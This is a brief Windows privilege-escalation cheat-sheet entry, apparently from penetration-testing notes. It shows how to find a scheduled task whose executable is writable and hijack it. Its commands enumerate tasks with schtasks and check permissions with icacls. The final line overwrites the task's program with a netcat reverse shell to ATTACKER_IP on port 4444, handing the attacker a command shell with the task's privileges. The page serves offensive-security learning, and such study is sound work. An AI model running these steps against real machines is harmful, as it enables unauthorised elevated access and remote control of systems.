Scheduled tasks
List tasks
schtasksGather information about a task
We look for "Task to Run" executable.
schtasks /query /tn <VULN TASK> /fo list /v
Check for file permissions
icacls <TASK TO RUN>If we have write permission on the executable, we can edit it.
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > <TASK TO RUN>Last updated